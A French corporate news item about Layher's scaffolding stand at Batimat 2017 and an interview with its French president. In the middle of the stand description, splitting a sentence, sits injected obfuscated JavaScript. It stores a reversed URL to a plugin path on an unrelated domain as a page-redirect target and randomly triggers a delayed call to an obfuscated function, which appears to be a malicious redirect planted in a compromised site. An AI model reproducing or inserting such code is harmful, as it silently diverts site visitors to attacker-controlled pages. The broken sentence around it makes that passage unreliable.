ACTUALITÉS

BATIMAT 2017 : UN ÉVÉNEMENT DE GRANDE AMPLEUR

Présent lors de la dernière édition du salon Batimat en novembre 2017, Layher est venu une nouvelle fois à votre rencontre. Cet événement fût l’occasion pour la filiale française du groupe allemand de montrer l’étendu de son savoir-faire.  

 

 

RETOUR SUR L’ÉVÉNEMENT PROFESSIONNEL DE L’ANNÉE

 

A l’occasion de cette nouvelle édition, Layher a conçu un stand de 250 m² au sol, soit 30 tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tonnes de matériel. Un « Parcours Métiers » a été mis en place, montrant l’ensemble des innovations sur l’Événementiel, le BTP,  l’Industrie et l’Artisanat.  Une mezzanine à 4m du sol a également été créée mettant à profit un espace restauration. Un bar ainsi que des tables et des chaises furent disponibles pour les visiteurs, venant profiter d’une vue imprenable sur l’ensemble du matériel Layher.  De plus, une animation selfie a été créée afin de laisser un souvenir à chaque visiteur présent sur le stand. 

 

Mezzanine-723-2

 

UNE INTERVIEW ACCORDÉE PAR ERIC LIMASSET, PRÉSIDENT DE LAYHER FRANCE

 

Lors du salon Batimat, M. Eric Limasset, Président de la filiale française a accordé une interview à Batiweb Tv. Après une rapide présentation de la filiale, premier fabricant mondial d’échafaudage, M. Limasset  a exprimé la  volonté de la filiale de rester plus proche de ses clients, en participant à chaque édition du salon Batimat. Présent sur un marché en perpétuelle croissance, le groupe Layher fabrique et diffuse à travers le monde des produits de qualité allemande. Après avoir conquis plusieurs secteurs tels que le bâtiment, l’industrie ou le second oeuvre, Layher souhaite à présent plus se développer auprès des secteurs de la distribution, de l’artisanat, du BTP et de l’événementiel. 

 

 

 

Source : BatiwebTV